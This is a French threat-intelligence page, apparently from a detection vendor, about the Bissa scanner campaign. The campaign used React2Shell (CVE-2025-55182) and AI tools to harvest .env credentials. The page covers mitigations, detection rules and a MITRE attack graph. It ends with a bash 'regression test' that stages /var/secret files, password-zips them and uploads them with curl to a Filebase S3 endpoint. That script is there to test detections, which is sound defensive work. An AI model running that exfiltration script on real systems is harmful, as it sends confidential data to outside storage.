Bissa Scanner Dévoilé : Exploitation de Masse Assistée par IA et Récolte d’Identifiants
Suivre 
Detection stack
- AIDR
- Alert
- ETL
- Query
Résumé
Un serveur exposé a révélé une opération à grande échelle qui utilisait la plateforme de scanner Bissa, Claude Code et OpenClaw pour automatiser l’exploitation de cibles exposées à Internet via une vulnérabilité React2Shell (CVE‑2025‑55182). La campagne a récolté des millions de fichiers .env contenant des identifiants de haute valeur provenant de services d’IA, cloud, de paiements et de messagerie. Les données collectées ont été téléchargées sur un bucket S3 public sur Filebase pour une utilisation ultérieure. L’opération ciblait des organisations dans les secteurs financiers, des cryptomonnaies et de la distribution.
Enquête
Les analystes ont récupéré plus de 13 000 fichiers montrant le flux de travail pour scanner, exploiter, valider et prioriser les environnements des victimes. Les journaux ont confirmé plus de 900 compromissions réussies utilisant l’exploit React2Shell. Des bots Telegram ont été utilisés pour des alertes en temps réel, liant chaque détection aux détails de la victime. Le scanner contenait également un module pour une vulnérabilité de WordPress W3 Total Cache (CVE‑2025‑9501) bien qu’aucune exploitation réussie n’ait été observée.
Atténuation
Corrigez les applications et frameworks vulnérables rapidement, en particulier les composants React2Shell et WordPress W3 Total Cache. Déplacez les secrets des fichiers .env vers des gestionnaires de secrets dédiés et faites pivoter régulièrement les identifiants. Renforcez l’accès aux métadonnées cloud et appliquez le principe du moindre privilège RBAC. Surveillez le trafic sortant pour détecter les téléchargements non autorisés vers des services de stockage externes.
Réponse
Mettez en œuvre des règles de détection pour l’exploitation de CVE‑2025‑55182 et les téléchargements non autorisés vers S3. Bloquez les domaines malveillants connus et les communications des bots Telegram. Effectuez une analyse judiciaire des hôtes compromis pour localiser les charges résistantes et les supprimer. Notifiez les utilisateurs affectés et faites pivoter immédiatement tout identifiant ayant fuité.
"graph TB %% Class definitions classDef technique fill:#ffcc99 classDef tool fill:#cccccc classDef action fill:#99ccff classDef operator fill:#ff9900 %% Nodes tool_bissa_scanner["<b>Outil</b> – <b>Nom</b>: Scanner Bissa<br/><b>Objectif</b>: Réaliser un balayage actif massif en utilisant des flux de cibles"] class tool_bissa_scanner tool tech_T1595_002["<b>Technique</b> – <b>T1595.002 Balayage Actif : Balayage de Vulnérabilités</b><br/><b>Description</b>: Balaye les hôtes exposés à l’Internet pour trouver des services vulnérables"] class tech_T1595_002 technique tech_T1190["<b>Technique</b> – <b>T1190 Exploitation d’Application Exposée Publiquement</b><br/><b>Description</b>: Exploite des applications web vulnérables pour obtenir un accès initial"] class tech_T1190 technique tool_react2shell["<b>Outil</b> – <b>Nom</b>: React2Shell (CVEu20112025u201155182)<br/><b>Fonction</b>: Fournit l’exécution à distance de code via une charge utile React spécifiquement conçue"] class tool_react2shell tool tech_T1210["<b>Technique</b> – <b>T1210 Exploitation de Services à Distance</b><br/><b>Description</b>: Exécute des charges sur des services à distance pour obtenir l’exécution de code"] class tech_T1210 technique tech_T1211["<b>Technique</b> – <b>T1211 Exploitation pour Évasion Défensive</b><br/><b>Description</b>: Utilise des vulnérabilités pour contourner les défenses et rester caché"] class tech_T1211 technique tech_T1552_001["<b>Technique</b> – <b>T1552.001 Identifiants Non Sécurisés : Identifiants dans des Fichiers</b><br/><b>Description</b>: Récolte des identifiants stockés dans des fichiers de configuration comme .env"] class tech_T1552_001 technique tech_T1119["<b>Technique</b> – <b>T1119 Collecte Automatisée</b><br/><b>Description</b>: Automatise la validation, la priorisation et le regroupement de données collectées pour l’exfiltration"] class tech_T1119 technique tech_T1102_002["<b>Technique</b> – <b>T1102.002 Service Web : Communication Bidirectionnelle</b><br/><b>Description</b>: Utilise des services web (bots Telegram) pour échanger des commandes et des données"] class tech_T1102_002 technique tool_telegram_bot["<b>Outil</b> – <b>Nom</b>: Bots Telegram @bissapwned_bot, @bissa_scan_bot<br/><b>Objectif</b>: Canal de commande et contrôle"] class tool_telegram_bot tool tech_T1567_002["<b>Technique</b> – <b>T1567.002 Exfiltration par Service Web : Exfiltration vers Stockage Cloud</b><br/><b>Description</b>: Télécharge des archives volées vers le stockage cloud via service web"] class tech_T1567_002 technique tool_filebase_bucket["<b>Outil</b> – <b>Nom</b>: Bucket compatible S3 Filebase (bissapromax)<br/><b>Objectif</b>: Stocke les archives d’identifiants exfiltrées"] class tool_filebase_bucket tool tech_T1537["<b>Technique</b> – <b>T1537 Transfert de Données vers Compte Cloud</b><br/><b>Description</b>: Transfère des données vers un compte cloud contrôlé par l’attaquant pour une récupération ultérieure"] class tech_T1537 technique tech_T1068["<b>Technique</b> – <b>T1068 Exploitation pour Escalade de Privilège</b><br/><b>Description</b>: Exploite les identifiants récoltés pour obtenir des privilèges plus élevés et des mouvements latéraux"] class tech_T1068 technique %% Connections tool_bissa_scanner –>|performs| tech_T1595_002 tech_T1595_002 –>|identifies vulnerable services| tech_T1190 tech_T1190 –>|uses| tool_react2shell tool_react2shell –>|delivers payload to| tech_T1210 tech_T1210 –>|enables| tech_T1211 tech_T1211 –>|allows| tech_T1552_001 tech_T1552_001 –>|feeds into| tech_T1119 tech_T1119 –>|sends data via| tech_T1102_002 tech_T1102_002 –>|implemented by| tool_telegram_bot tech_T1102_002 –>|exfiltrates to| tech_T1567_002 tech_T1567_002 –>|stores in| tool_filebase_bucket tool_filebase_bucket –>|enables| tech_T1537 tech_T1537 –>|supports| tech_T1068 "
Flux d’attaque
Détections
Tentative d’exploitation possible de CVE-2025-55182 (RCE non authentifié dans les composants serveur React) (via serveur web)
Voir
Tentative d’exploitation possible de CVE-2025-55182 (RCE non authentifié dans les composants serveur React) (via proxy)
Voir
Communications C2 possibles via HTTP vers IP directe avec port inhabituel (via proxy)
Voir
Exfiltration de données via Filebase compatible S3 [Proxy]
Voir
Exfiltration de données via Filebase compatible S3 [AWS Cloudtrail]
Voir
Exécution de simulation
Prérequis : La vérification pré-vol de télémetrie & base doit avoir réussi.
-
Narration & Commandes d’attaque :
L’adversaire a récolté un ensemble de documents confidentiels de/var/secret/. Pour éviter la détection, il archive d’abord les données dans un fichier ZIP protégé par mot de passe, puis utilisecurlpour télécharger l’archive directement vers le point de terminaison S3 Filebase via le proxy de l’entreprise. Le proxy journalise l’URL complète de la requête, laquelle correspond à la règle de détection. -
Script de test de régression :
#!/usr/bin/env bash set -euo pipefail # 1️⃣ Mettre en scène les données (T1074) STAGE_DIR="/tmp/staged_data" mkdir -p "$STAGE_DIR" cp -r /var/secret/* "$STAGE_DIR/" # 2️⃣ Archiver les données (T1560.001) – zip protégé par mot de passe ARCHIVE="/tmp/exfil_archive.zip" ZIP_PASSWORD="P@ssw0rd!" zip -r -P "$ZIP_PASSWORD" "$ARCHIVE" "$STAGE_DIR" > /dev/null # 3️⃣ Exfiltrer via le point de terminaison Filebase S3 (T1020) # Supposez que le proxy est accessible à http://proxy.company.local:3128 FILEBASE_URL="https://s3.filebase.com/mybucket/exfil_archive.zip" curl -x http://proxy.company.local:3128 -T "$ARCHIVE" -H "Host: s3.filebase.com" -H "User-Agent: Mozilla/5.0" "$FILEBASE_URL" --silent --output /dev/null echo "Tentative d'exfiltration terminée." -
Commandes de nettoyage :
# Supprimez les fichiers mis en scène et l'archive rm -rf /tmp/staged_data /tmp/exfil_archive.zip # (Facultatif) Videz les connexions du proxy si nécessaire # Pour Squid : squid -k rotate echo "Nettoyage terminé."